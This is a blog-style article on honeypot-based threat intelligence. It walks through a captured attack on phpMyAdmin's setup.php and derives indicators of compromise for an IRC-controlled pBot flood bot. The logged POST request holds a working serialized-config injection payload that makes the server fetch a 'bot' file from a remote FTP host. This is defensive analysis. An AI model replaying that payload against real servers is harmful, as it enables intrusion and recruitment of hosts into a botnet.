Realizing your thirst for intel
Sitting in the trenches of intrusion detection systems (IDS) you quickly learn the need for intel. You also thirst to know what the actors are trying to do–those who are setting off the alerts of course. This is where my love for my honeypots comes in.
Honeypots are useful in that they indicate the tools a malicious actor's using–unbeknownst to them–and help to determine their activities. From there, the honeypots assist in the research process aimed at further identifying their intentions. This process can only be done after you’re able to dig into what your honeypots are telling you. Like logs, honeypots tell you a number of things.
So, what are honeypots really?
First, let’s understand what most honeypots are. Most honeypots are merely systems connected to the Internet - minding their own business, not doing anything but listening, and definitely not attracting attention. They would prefer not to be bothered (don’t we all know that feeling?). However, when they’re touched they come to life and tell you everything, all the dirty little secrets they have to share. Something like what siblings do on a long car ride.
When your honeypots start talking, the first part of their rant is about Threat Intelligence. The Threat Intelligence begins as “an IP Address” connecting to a system it has no reason to connect to. (Is this actor a bad actor or just someone wanting a map of the Internet?). In my opinion, if you touch something that you have no reason to touch you’re going to get some sort of threat score. From this, I have a record of you for later use.
Next part of the discussion, now that the actor knows there’s a system listening on X number of ports, is the question of whether they move on to the next address? If so, then I would give them a low threat score and note them as “seen as a scanner on this day." If they probe a little deeper, or skip the discovery of the base system to look for something more, the score starts to rapidly climb.
Inspiration for this article
Let’s take a look at this morning’s events that inspired me to write this article.
Whoever/whatever, with a public address of 126.96.36.199, connected to one of my honeypots and was looking to see if I left phpMyAdmin unsecured and open to the Internet:
GET /phpmyadmin/scripts/setup.php HTTP/1.1 Connection: Keep-Alive, TE Host: <my.honepot.address.here> Keep-Alive: 300 Te: deflate,gzip;q=0.3 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
My honeypot replied telling them “Yes, I have that file” and sent the actor what they thought was the setup.php file. The actor then responded with a POST to the file.
POST /phpMyAdmin/scripts/setup.php HTTP/1.1 Connection: TE Content-Length: 225 Content-Type: application/x-www-form-urlencoded Host: <my.honeypot.address.here> Referer: http://<my.honeypot.address.here>/phpMyAdmin/scripts/setup.php Te: deflate,gzip;q=0.3 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5F Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A46%3A%22ftp%3A%2F%2Fululi1%3A123456%4062%2E75%2E 143%2E248%2Fhttpdocs%2Fbot%22%3B%7D%7D
Taking a look at threat intelligence and an IOC
From here we have threat intelligence and an indicators of compromise (IOC). The threat intel we have is that the actor 188.8.131.52 is a vulnerability/exploit scanner looking to exploit phpMyAdmin. We also have the Threat Intel that 184.108.40.206 is hosting the file the actor is trying to use to exploit phpMyAdmin.
The first IOC that we see here is that 220.127.116.11is hosting the needed exploit file over FTP. We can use this information to monitor our firewall logs for FTP connections to this address. Is there more? Yes, there is.
We can now look at the bot script deeper. Looking into it more closely we will find: an IP address and port for connecting, IRC commands being used with this IP address, and reports on some Geographical IP information from freegeoip.net, along with system information. The script also shows that the host will primarily be used as a node in a UDP and TCP Flood actor.
The newly discovered address can now be added in the script as Threat Intel for a malicious IRC server. We can also include the IP address and port as an IOC. Along with that, we are also being told that another IOC that can be added is a higher than usual amount of UDP/TCP traffic from a host on our network(s). Finally, we can use the service or program of pBot as an IOC.
We now have further Threat Intel on the following addresses;
- 18.104.22.168 == vulnerability/exploit scanner.
- 22.214.171.124 == hosts malicious files.
- 126.96.36.199 == malicious IRC server and/or Command and Control server.
We have the following Indicators of Compromise;
- FTP traffic for 188.8.131.52
- Traffic to 184.108.40.206 port 3303
- Downloading of the file name bot
- The running service/program of pBot
- Higher than normal UDP/TCP traffic
- DNS queries of freegeoip.net
What's the value here?
This information can now be used to search our past and future logs, create firewall rules to alert or block on traffic, and also correlate with other events in the past and future.